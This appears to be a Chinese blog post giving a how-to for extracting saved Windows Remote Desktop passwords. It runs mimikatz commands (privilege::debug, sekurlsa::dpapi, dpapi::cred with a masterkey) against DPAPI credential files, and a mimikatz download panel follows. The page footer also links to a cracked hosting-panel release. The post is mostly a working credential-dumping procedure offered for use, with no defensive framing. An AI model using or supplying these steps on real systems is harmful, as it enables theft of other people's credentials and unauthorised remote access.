此方法需要灵活贯通,操作稍微比较复杂
1、底部下载软件 mimikatz
2、查询是否有RDP密码文件(CMD运行)
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
分不清哪个是哪个怎么办,打开 “控制面板\用户帐户\凭据管理器”对照修改时间,复制右边文字
3、右键管理员身份运行 mimikatz.exe 对密码文件进行解密
privilege::debug dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710
复制 guidMasterKey 右侧文本
sekurlsa::dpapi
根据guidMasterKey,使用mimikatz找到对应的Masterkey
通过Masterkey,使用mimikatz解密pbData数据,获取RDP连接明文密码
dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710 /masterkey:c7c73d9e7a83ed8991e7a0de7942a5ab6c8924ff71c33ef8370a5294f677042787f311c534977476cbe6514ae2ba77d11172fbd5b6a51ff188f87d720b44fee1
下
載
面
板
載
面
板
文件名稱:mimikatz
更新時間:2023-08-08 15:12:55
下載声明:本站默認解壓密碼(www.aeink.com)網絡資源來自網絡收集或本人原創,轉載請註明出處!若資源侵犯了你的版權,請聯繫博主,我們會在24H內刪除侵權資源!
转载请注明出处 AE博客|墨渊 » 通过mimikatz获取RDPwindows远程桌面密码凭证获取
贝塔PHP用户管理系统v1.0 
DNF活动回归百分百秒领7天黑钻/Q钻30天 
关于EMLOG | QQ登录插件的BUG 
搜狗图床接口PHP源码案例分享 
AMH国内领先的云主机面板5.2 破解版 已和谐
发表评论